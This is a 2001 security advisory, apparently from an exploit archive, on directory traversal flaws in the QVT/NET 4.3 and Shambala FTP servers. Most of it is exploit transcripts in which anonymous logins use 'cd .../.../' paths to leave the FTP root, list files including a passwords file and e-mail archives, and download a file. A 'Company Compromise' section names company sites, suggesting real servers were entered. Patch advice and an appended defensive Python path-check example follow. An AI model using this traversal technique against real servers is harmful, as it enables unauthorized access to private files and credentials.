alt3kx-advisories-2001.txt
Posted Jun 6, 2001
Authored by Alt3kx | Site raza-mexicana.org

The QVT/NET 4.3 FTP Server and the Shambala FTP Server for Windows 9x/NT/2000 contain remote vulnerabilities which allow users to see and retrieve any file on the server. Exploit information included.

tags | exploit, remote, vulnerability
systems | windows, 9x
MD5 | f31b863e65cf4e42820d482689e3046f


======================================================================

QVT/NET 4.3 FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x, you don't rule, dude!
======================================================================
------------------------=[Brief Description]=-------------------------

QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory, list the files in that
path, and GET files remotely.

----------------------------=[Platforms]=--------------------------------

Windows 9.x
Windows NT
Windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:


C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.

SO THE BUG... ...

ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins

.
.
.
.

-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) (168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.



C:\>type raza-alt3kx.txt

Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


C:\>


-------------------------------=[Patch]=---------------------------------

The recommended action is to change the permissions or to define a
separate directory for anonymous users that holds no sensitive files.

-------------------------=[Company Compromise]=--------------------------

Company:

http://www.qpc.com






======================================================================


Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x, you don't rule, dude!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory, list the files in that
path, and GET files remotely.

----------------------------=[Platforms]=------------------------------

Windows 9.x
Windows NT
Windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx
---------- owner group 283 21-maj-01 17:55 index-_-1_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-2_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-3_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-4_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-5_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-6_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-7_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-8_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-9_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-10_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-11_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-12_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-13_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-14_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-15_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-16_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_-1.htm
---------- owner group 283 21-maj-01 17:55 .htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-2.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-3.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-4.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-5.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-6.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-7.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-8.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-9.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-10.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-12.htm
---------- owner group 283 21-maj-01 18:08 index-_0_-1_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_1_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 15444 04-maj-01 14:26 SCAN.log
---------- owner group 140340 04-maj-01 14:05 MAILS-PRESIDENCIA.txt
---------- owner group 466944 18-sep-99 09:32 Shambala.exe
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG
---------- owner group 31 21-maj-01 17:50 passwordsxxx.txt
d--------- owner group 0 21-maj-01 17:50 Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe
d--------- owner group 0 18-jan-01 15:39 Netscape 6
d--------- owner group 0 18-jan-01 14:50 Netscape 6 Setup
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe

.
.
.
.
.

---------- owner group 168 21-maj-01 19:07 raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recommended action is to change the permissions or to define a
separate directory for anonymous users that holds no sensitive files.


-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com
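
Both transcripts show the same pattern: "cd .." is refused, but a path built from "..." components is accepted. The following is an added example, not code from the advisory or from either vendor; it contrasts an assumed ".."-only filter with a CWD check that resolves the path against the virtual FTP root. The names naive_cwd_allowed and resolve_cwd are hypothetical.

```python
import re
from typing import Optional

# A path component made only of dots and spaces ("...", ". .", ".. ").
# The transcripts above show such names reaching parent directories.
DOT_ONLY = re.compile(r"^\s*\.+[\s.]*$")

def naive_cwd_allowed(arg: str) -> bool:
    """Assumed weak filter: refuses only the exact component '..'."""
    parts = arg.replace("\\", "/").split("/")
    return ".." not in parts

def resolve_cwd(cwd: str, arg: str) -> Optional[str]:
    """Resolve arg against the virtual directory cwd.

    Returns the new virtual path (always rooted at '/'), or None when the
    request must be refused with a 550 reply. The caller joins the result
    onto the real FTP root only after this check has passed.
    """
    arg = arg.replace("\\", "/")
    # An absolute argument restarts from the virtual root.
    stack = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                return None          # would climb above the FTP root
            stack.pop()
        elif DOT_ONLY.match(part) or ":" in part:
            return None              # '...' style names, drive letters
        else:
            stack.append(part)
    return "/" + "/".join(stack)
```

The allowlist approach matters here: the path is rebuilt from components that were individually accepted, so a name the file system interprets specially never reaches it.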





